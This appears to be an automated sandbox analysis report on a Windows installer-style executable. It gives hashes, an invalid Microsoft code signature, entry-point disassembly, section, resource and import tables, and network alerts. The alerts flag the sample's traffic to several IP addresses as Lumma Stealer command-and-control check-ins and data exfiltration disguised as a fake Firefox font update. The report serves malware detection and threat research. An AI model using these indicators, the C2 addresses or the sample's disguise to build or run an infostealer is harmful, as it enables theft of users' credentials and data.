                                                                                                                                                                SSDEEP:24576:jtdAm9DUi/CR3wCkCiRgoG7hBaHkbEXXeG/jFJ5CnBTx93rhK2whYYY4:RqTytRFk6ekpCnH9h/Yn
                                                                                                                                                                TLSH:C1F7294B5353AAB38B19056206BDEEDC17B23A0407F7C0D7B958758A3CA75CA36BD903
                                                                                                                                                                File Content Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7.......................................................................................................................................
                                                                                                                                                                Icon Hash:6187133b3b1f8671
                                                                                                                                                                Entrypoint:0x50156c
                                                                                                                                                                Entrypoint Section:.itext
                                                                                                                                                                Digitally signed:true
                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                Subsystem:windows gui
                                                                                                                                                                Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                                                                                                                                                                DLL Characteristics:NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                Time Stamp:0x57051F89 [Wed Apr 6 14:39:05 2016 UTC]
                                                                                                                                                                TLS Callbacks:
                                                                                                                                                                CLR (.Net) Version:
                                                                                                                                                                OS Version Major:5
                                                                                                                                                                OS Version Minor:0
                                                                                                                                                                File Version Major:5
                                                                                                                                                                File Version Minor:0
                                                                                                                                                                Subsystem Version Major:5
                                                                                                                                                                Subsystem Version Minor:0
                                                                                                                                                                Import Hash:f62b90e31eca404f228fcf7068b00f31
                                                                                                                                                                Signature Valid:false
                                                                                                                                                                Signature Issuer:CN=Microsoft Code Signing PCA 2010, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                Error Number:-2146869232
                                                                                                                                                                Not Before, Not After
                                                                                                                                                                • 15/12/2020 21:24:20 02/12/2021 21:24:20
                                                                                                                                                                Subject Chain
                                                                                                                                                                • CN=Microsoft Corporation, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
                                                                                                                                                                Version:3
                                                                                                                                                                Thumbprint MD5:4068B1B0494EFA79F5A751DCCA8111CD
                                                                                                                                                                Thumbprint SHA-1:914A09C2E02C696AF394048BCB8D95449BCD5B9E
                                                                                                                                                                Thumbprint SHA-256:4A838904E732A380E2856A9D6FEE926E5C57EB59336292AC5D9E47C9B2C1ED13
                                                                                                                                                                Serial:33000003DFFB6AE3F427ECB6A30000000003DF
                                                                                                                                                                Instruction
                                                                                                                                                                push ebp
                                                                                                                                                                mov ebp, esp
                                                                                                                                                                add esp, FFFFFFF0h
                                                                                                                                                                push ebx
                                                                                                                                                                push esi
                                                                                                                                                                push edi
                                                                                                                                                                mov eax, 004FEBF4h
                                                                                                                                                                call 00007FBDE86023E2h
                                                                                                                                                                push FFFFFFECh
                                                                                                                                                                mov eax, dword ptr [00504E38h]
                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                mov ebx, dword ptr [eax+00000170h]
                                                                                                                                                                push ebx
                                                                                                                                                                call 00007FBDE860328Dh
                                                                                                                                                                and eax, FFFFFF7Fh
                                                                                                                                                                push eax
                                                                                                                                                                push FFFFFFECh
                                                                                                                                                                mov eax, dword ptr [00504E38h]
                                                                                                                                                                push ebx
                                                                                                                                                                call 00007FBDE86034E2h
                                                                                                                                                                xor eax, eax
                                                                                                                                                                push ebp
                                                                                                                                                                push 005015E7h
                                                                                                                                                                push dword ptr fs:[eax]
                                                                                                                                                                mov dword ptr fs:[eax], esp
                                                                                                                                                                push 00000001h
                                                                                                                                                                call 00007FBDE8602C2Dh
                                                                                                                                                                call 00007FBDE86F7D8Ch
                                                                                                                                                                mov eax, dword ptr [004FE82Ch]
                                                                                                                                                                push eax
                                                                                                                                                                push 004FE890h
                                                                                                                                                                mov eax, dword ptr [00504E38h]
                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                call 00007FBDE8675821h
                                                                                                                                                                call 00007FBDE86F7DE0h
                                                                                                                                                                xor eax, eax
                                                                                                                                                                pop edx
                                                                                                                                                                pop ecx
                                                                                                                                                                pop ecx
                                                                                                                                                                mov dword ptr fs:[eax], edx
                                                                                                                                                                jmp 00007FBDE86FAA2Bh
                                                                                                                                                                jmp 00007FBDE85FDB09h
                                                                                                                                                                call 00007FBDE86F7B5Ch
                                                                                                                                                                mov eax, 00000001h
                                                                                                                                                                call 00007FBDE85FE5CAh
                                                                                                                                                                call 00007FBDE85FDF4Dh
                                                                                                                                                                mov eax, dword ptr [00504E38h]
                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                mov edx, 0050177Ch
                                                                                                                                                                call 00007FBDE867532Ch
                                                                                                                                                                push 00000005h
                                                                                                                                                                mov eax, dword ptr [00504E38h]
                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                mov eax, dword ptr [eax+00000170h]
                                                                                                                                                                push eax
                                                                                                                                                                call 00007FBDE86034A3h
                                                                                                                                                                mov eax, dword ptr [00504E38h]
                                                                                                                                                                mov eax, dword ptr [eax]
                                                                                                                                                                mov edx, dword ptr [004D9740h]
                                                                                                                                                                NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x10d0000x3840.idata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x1130000x87a00.rsrc
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x4778fe10x21d0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_TLS0x1120000x18.rdata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_IAT0x10da800x88c.idata
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                .text0x10000xfe0840xfe200e4dc63033da7e84c78cb02b3453c260aFalse0.4818685055951795data6.4800534551578055IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .itext0x1000000x17880x1800030d751d7e20e11f863bdb27a950c708False0.5203450520833334data5.94899155660316IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                .data0x1020000x30680x32002f90c6f68c18651f5b580d5ad2b852e9False0.421796875data4.334644118113417IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .bss0x1060000x61940x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .idata0x10d0000x38400x3a00e31e730fc86b9dac8932bd3f92752751False0.31041217672413796data5.202469592139362IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .tls0x1110000x3c0x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                .rdata0x1120000x180x200d6264f4705ad03600aa29f24c89eb799False0.05078125MacBinary, Mon Feb 6 07:28:16 2040 INVALID date, modified Mon Feb 6 07:28:16 2040 "Q"0.20544562813451883IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                .rsrc0x1130000x87a000x87a001c448c1f995d48f7fbeb430dbdc5cb56False0.4662928427419355data7.203198304573814IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                RT_CURSOR0x113ca40x134Targa image data - Map 64 x 65536 x 1 +32 "\001"EnglishUnited States0.38636363636363635
                                                                                                                                                                RT_CURSOR0x113dd80x134dataEnglishUnited States0.4642857142857143
                                                                                                                                                                RT_CURSOR0x113f0c0x134dataEnglishUnited States0.4805194805194805
                                                                                                                                                                RT_CURSOR0x1140400x134dataEnglishUnited States0.38311688311688313
                                                                                                                                                                RT_CURSOR0x1141740x134dataEnglishUnited States0.36038961038961037
                                                                                                                                                                RT_CURSOR0x1142a80x134dataEnglishUnited States0.4090909090909091
                                                                                                                                                                RT_CURSOR0x1143dc0x134Targa image data - RGB 64 x 65536 x 1 +32 "\001"EnglishUnited States0.4967532467532468
                                                                                                                                                                RT_BITMAP0x1145100x4e8Device independent bitmap graphic, 48 x 48 x 4, image size 11520.2945859872611465
                                                                                                                                                                RT_BITMAP0x1149f80xe8Device independent bitmap graphic, 16 x 16 x 4, image size 1280.521551724137931
                                                                                                                                                                RT_ICON0x114ae00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 8504 x 8504 px/mEnglishUnited States0.1044451673961907
                                                                                                                                                                RT_ICON0x1253080x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 8504 x 8504 px/mEnglishUnited States0.12528904771915073
                                                                                                                                                                RT_ICON0x12e7b00x4228Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 8504 x 8504 px/mEnglishUnited States0.17442135096835143
                                                                                                                                                                RT_ICON0x1329d80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 8504 x 8504 px/mEnglishUnited States0.2287344398340249
                                                                                                                                                                RT_ICON0x134f800x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 8504 x 8504 px/mEnglishUnited States0.3271575984990619
                                                                                                                                                                RT_ICON0x1360280x468Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 8504 x 8504 px/mEnglishUnited States0.5824468085106383
                                                                                                                                                                RT_STRING0x1364900xecdata0.6059322033898306
                                                                                                                                                                RT_STRING0x13657c0x250data0.47466216216216217
                                                                                                                                                                RT_STRING0x1367cc0x28cdata0.4647239263803681
                                                                                                                                                                RT_STRING0x136a580x3e4data0.4347389558232932
                                                                                                                                                                RT_STRING0x136e3c0x9cdata0.717948717948718
                                                                                                                                                                RT_STRING0x136ed80xe8data0.6293103448275862
                                                                                                                                                                RT_STRING0x136fc00x468data0.3820921985815603
                                                                                                                                                                RT_STRING0x1374280x38cdata0.3898678414096916
                                                                                                                                                                RT_STRING0x1377b40x3dcdata0.39271255060728744
                                                                                                                                                                RT_STRING0x137b900x360data0.37037037037037035
                                                                                                                                                                RT_STRING0x137ef00x40cdata0.3783783783783784
                                                                                                                                                                RT_STRING0x1382fc0x108data0.5113636363636364
                                                                                                                                                                RT_STRING0x1384040xccdata0.6029411764705882
                                                                                                                                                                RT_STRING0x1384d00x234data0.5070921985815603
                                                                                                                                                                RT_STRING0x1387040x3c8data0.3181818181818182
                                                                                                                                                                RT_STRING0x138acc0x32cdata0.43349753694581283
                                                                                                                                                                RT_STRING0x138df80x2a0data0.41964285714285715
                                                                                                                                                                RT_RCDATA0x1390980x82e8dataEnglishUnited States0.11261637622344235
                                                                                                                                                                RT_RCDATA0x1413800x10data1.5
                                                                                                                                                                RT_RCDATA0x1413900x1800PE32+ executable (console) x86-64, for MS WindowsEnglishUnited States0.3924153645833333
                                                                                                                                                                RT_RCDATA0x142b900x6b0data0.6466121495327103
                                                                                                                                                                RT_RCDATA0x1432400x5b10PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS WindowsEnglishUnited States0.3255404941660947
                                                                                                                                                                RT_RCDATA0x148d500x125Delphi compiled form 'TMainForm'0.7508532423208191
                                                                                                                                                                RT_RCDATA0x148e780x3a2Delphi compiled form 'TNewDiskForm'0.524731182795699
                                                                                                                                                                RT_RCDATA0x14921c0x320Delphi compiled form 'TSelectFolderForm'0.53625
                                                                                                                                                                RT_RCDATA0x14953c0x300Delphi compiled form 'TSelectLanguageForm'0.5703125
                                                                                                                                                                RT_RCDATA0x14983c0x5d9Delphi compiled form 'TUninstallProgressForm'0.4562458249832999
                                                                                                                                                                RT_RCDATA0x149e180x461Delphi compiled form 'TUninstSharedFileForm'0.4335414808206958
                                                                                                                                                                RT_RCDATA0x14a27c0x2092Delphi compiled form 'TWizardForm'0.2299112497001679
                                                                                                                                                                RT_GROUP_CURSOR0x14c3100x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                RT_GROUP_CURSOR0x14c3240x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.25
                                                                                                                                                                RT_GROUP_CURSOR0x14c3380x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c34c0x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c3600x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c3740x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_CURSOR0x14c3880x14Lotus unknown worksheet or configuration, revision 0x1EnglishUnited States1.3
                                                                                                                                                                RT_GROUP_ICON0x14c39c0x5adataEnglishUnited States0.7777777777777778
                                                                                                                                                                RT_VERSION0x14c3f80x15cdataEnglishUnited States0.5689655172413793
                                                                                                                                                                RT_MANIFEST0x14c5540x62cXML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States0.4240506329113924
                                                                                                                                                                DLLImport
                                                                                                                                                                oleaut32.dllSysFreeString, SysReAllocStringLen, SysAllocStringLen
                                                                                                                                                                advapi32.dllRegQueryValueExW, RegOpenKeyExW, RegCloseKey
                                                                                                                                                                user32.dllGetKeyboardType, LoadStringW, MessageBoxA, CharNextW
                                                                                                                                                                kernel32.dllGetACP, Sleep, VirtualFree, VirtualAlloc, GetSystemInfo, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, VirtualQuery, WideCharToMultiByte, SetCurrentDirectoryW, MultiByteToWideChar, lstrlenW, lstrcpynW, LoadLibraryExW, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleW, GetModuleFileNameW, GetLocaleInfoW, GetCurrentDirectoryW, GetCommandLineW, FreeLibrary, FindFirstFileW, FindClose, ExitProcess, ExitThread, CreateThread, CompareStringW, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle, CloseHandle
                                                                                                                                                                kernel32.dllTlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleW
                                                                                                                                                                user32.dllCreateWindowExW, WindowFromPoint, WaitMessage, WaitForInputIdle, UpdateWindow, UnregisterClassW, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoW, ShowWindow, ShowScrollBar, ShowOwnedPopups, SetWindowsHookExW, SetWindowTextW, SetWindowPos, SetWindowPlacement, SetWindowLongW, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRectEmpty, SetRect, SetPropW, SetParent, SetMenuItemInfoW, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongW, SetCapture, SetActiveWindow, SendNotifyMessageW, SendMessageTimeoutW, SendMessageA, SendMessageW, ScrollWindowEx, ScrollWindow, ScreenToClient, ReplyMessage, RemovePropW, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageW, RegisterClipboardFormatW, RegisterClassW, RedrawWindow, PtInRect, PostQuitMessage, PostMessageW, PeekMessageA, PeekMessageW, OffsetRect, OemToCharBuffA, MsgWaitForMultipleObjectsEx, MsgWaitForMultipleObjects, MessageBoxW, MessageBeep, MapWindowPoints, MapVirtualKeyW, LoadStringW, LoadKeyboardLayoutW, LoadIconW, LoadCursorW, LoadBitmapW, KillTimer, IsZoomed, IsWindowVisible, IsWindowUnicode, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsDialogMessageW, IsChild, InvalidateRect, IntersectRect, InsertMenuItemW, InsertMenuW, InflateRect, GetWindowThreadProcessId, GetWindowTextW, GetWindowRect, GetWindowPlacement, GetWindowLongW, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropW, GetParent, GetWindow, GetMessagePos, GetMessageW, GetMenuStringW, GetMenuState, GetMenuItemInfoW, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutNameW, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextW, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassLongW, GetClassInfoW, GetCapture, GetActiveWindow, FrameRect, FindWindowExW, FindWindowW, FillRect, ExitWindowsEx, EnumWindows, EnumThreadWindows, EnumChildWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextExW, DrawTextW, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawFocusRect, DrawEdge, DispatchMessageA, DispatchMessageW, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcW, DefMDIChildProcW, DefFrameProcW, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CharUpperBuffW, CharNextW, CharLowerBuffW, CharLowerW, CallWindowProcW, CallNextHookEx, BringWindowToTop, BeginPaint, AppendMenuW, CharToOemBuffA, AdjustWindowRectEx, ActivateKeyboardLayout
                                                                                                                                                                msimg32.dllAlphaBlend
                                                                                                                                                                gdi32.dllUnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RoundRect, RestoreDC, RemoveFontResourceW, Rectangle, RectVisible, RealizePalette, Polyline, Pie, PatBlt, MoveToEx, MaskBlt, LineTo, LineDDA, IntersectClipRect, GetWindowOrgEx, GetTextMetricsW, GetTextExtentPointW, GetTextExtentPoint32W, GetSystemPaletteEntries, GetStockObject, GetRgnBox, GetPixel, GetPaletteEntries, GetObjectW, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, GdiFlush, FrameRgn, ExtTextOutW, ExtFloodFill, ExcludeClipRect, EnumFontsW, Ellipse, DeleteObject, DeleteDC, CreateSolidBrush, CreateRectRgn, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectW, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, Chord, BitBlt, Arc, AddFontResourceW
                                                                                                                                                                version.dllVerQueryValueW, GetFileVersionInfoSizeW, GetFileVersionInfoW
                                                                                                                                                                mpr.dllWNetOpenEnumW, WNetGetUniversalNameW, WNetGetConnectionW, WNetEnumResourceW, WNetCloseEnum
                                                                                                                                                                kernel32.dlllstrcpyW, lstrcmpW, WriteProfileStringW, WritePrivateProfileStringW, WriteFile, WideCharToMultiByte, WaitForSingleObject, WaitForMultipleObjectsEx, VirtualQueryEx, VirtualQuery, VirtualFree, VirtualAlloc, TransactNamedPipe, TerminateProcess, SwitchToThread, SizeofResource, SignalObjectAndWait, SetThreadLocale, SetNamedPipeHandleState, SetLastError, SetFileTime, SetFilePointer, SetFileAttributesW, SetEvent, SetErrorMode, SetEndOfFile, SetCurrentDirectoryW, ResumeThread, ResetEvent, RemoveDirectoryW, ReleaseMutex, ReadFile, QueryPerformanceCounter, OpenProcess, OpenMutexW, MultiByteToWideChar, MulDiv, MoveFileExW, MoveFileW, LockResource, LocalFree, LocalFileTimeToFileTime, LoadResource, LoadLibraryExW, LoadLibraryW, LeaveCriticalSection, IsDBCSLeadByte, IsBadWritePtr, InitializeCriticalSection, GlobalFindAtomW, GlobalDeleteAtom, GlobalAddAtomW, GetWindowsDirectoryW, GetVersionExW, GetVersion, GetUserDefaultLangID, GetTickCount, GetThreadLocale, GetSystemTimeAsFileTime, GetSystemInfo, GetSystemDirectoryW, GetStdHandle, GetShortPathNameW, GetProfileStringW, GetProcAddress, GetPrivateProfileStringW, GetOverlappedResult, GetModuleHandleW, GetModuleFileNameW, GetLogicalDrives, GetLocaleInfoW, GetLocalTime, GetLastError, GetFullPathNameW, GetFileSize, GetFileAttributesW, GetExitCodeThread, GetExitCodeProcess, GetEnvironmentVariableW, GetDriveTypeW, GetDiskFreeSpaceW, GetDateFormatW, GetCurrentThreadId, GetCurrentThread, GetCurrentProcessId, GetCurrentProcess, GetCurrentDirectoryW, GetComputerNameW, GetCommandLineW, GetCPInfo, FreeResource, InterlockedIncrement, InterlockedExchangeAdd, InterlockedExchange, InterlockedDecrement, InterlockedCompareExchange, FreeLibrary, FormatMessageW, FlushFileBuffers, FindResourceW, FindNextFileW, FindFirstFileW, FindClose, FileTimeToSystemTime, FileTimeToLocalFileTime, EnumCalendarInfoW, EnterCriticalSection, DeviceIoControl, DeleteFileW, DeleteCriticalSection, CreateThread, CreateProcessW, CreateNamedPipeW, CreateMutexW, CreateFileW, CreateEventW, CreateDirectoryW, CopyFileW, CompareStringW, CompareFileTime, CloseHandle
                                                                                                                                                                advapi32.dllSetSecurityDescriptorDacl, RegSetValueExW, RegQueryValueExW, RegQueryInfoKeyW, RegOpenKeyExW, RegFlushKey, RegEnumValueW, RegEnumKeyExW, RegDeleteValueW, RegDeleteKeyW, RegCreateKeyExW, RegCloseKey, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, InitializeSecurityDescriptor, GetUserNameW, GetTokenInformation, FreeSid, EqualSid, AllocateAndInitializeSid
                                                                                                                                                                comctl32.dllInitCommonControls
                                                                                                                                                                kernel32.dllSleep
                                                                                                                                                                oleaut32.dllGetErrorInfo, GetActiveObject, RegisterTypeLib, LoadTypeLib, SysFreeString
                                                                                                                                                                ole32.dllOleUninitialize, OleInitialize, CoTaskMemFree, CLSIDFromProgID, CLSIDFromString, StringFromCLSID, CoCreateInstance, CoFreeUnusedLibraries, CoUninitialize, CoInitialize, IsEqualGUID
                                                                                                                                                                oleaut32.dllSafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
                                                                                                                                                                comctl32.dllInitializeFlatSB, FlatSB_SetScrollProp, FlatSB_SetScrollPos, FlatSB_SetScrollInfo, FlatSB_GetScrollPos, FlatSB_GetScrollInfo, _TrackMouseEvent, ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create, InitCommonControls
                                                                                                                                                                shell32.dllShellExecuteExW, ShellExecuteW, SHGetFileInfoW, ExtractIconW
                                                                                                                                                                shell32.dllSHGetPathFromIDListW, SHGetMalloc, SHChangeNotify, SHBrowseForFolderW
                                                                                                                                                                comdlg32.dllGetSaveFileNameW, GetOpenFileNameW
                                                                                                                                                                ole32.dllCoDisconnectObject
                                                                                                                                                                advapi32.dllAdjustTokenPrivileges
                                                                                                                                                                oleaut32.dllSysFreeString
                                                                                                                                                                Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                EnglishUnited States
                                                                                                                                                                TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                2024-12-22T23:30:19.760409+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:20.486574+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:20.486574+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:21.715303+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449731104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:22.496928+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449731104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:22.496928+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449731104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:24.417773+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449733104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:26.738257+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449736104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:28.931974+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:31.637679+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:33.777838+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:34.556675+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449742104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:36.554754+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449743104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:40.219207+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:41.011639+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744104.21.63.229443TCP
                                                                                                                                                                2024-12-22T23:30:45.969482+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449745194.58.112.174443TCP
                                                                                                                                                                2024-12-22T23:30:52.133737+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449748104.21.84.113443TCP
                                                                                                                                                                TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                Dec 22, 2024 23:30:18.516355991 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:18.516457081 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:18.516571999 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:18.519726992 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:18.519763947 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:19.760324955 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:19.760409117 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:19.765517950 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:19.765543938 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:19.765944958 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:19.819000959 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:19.837910891 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:19.837980986 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:19.838134050 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:20.486627102 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:20.487032890 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:20.487129927 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:20.488621950 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:20.488688946 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:20.488729000 CET49730443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:20.488746881 CET44349730104.21.63.229192.168.2.4
                                                                                                                                                                Dec 22, 2024 23:30:20.496095896 CET49731443192.168.2.4104.21.63.229
                                                                                                                                                                Dec 22, 2024 23:30:20.496140003 CET44349731104.21.63.229192.168.2.4
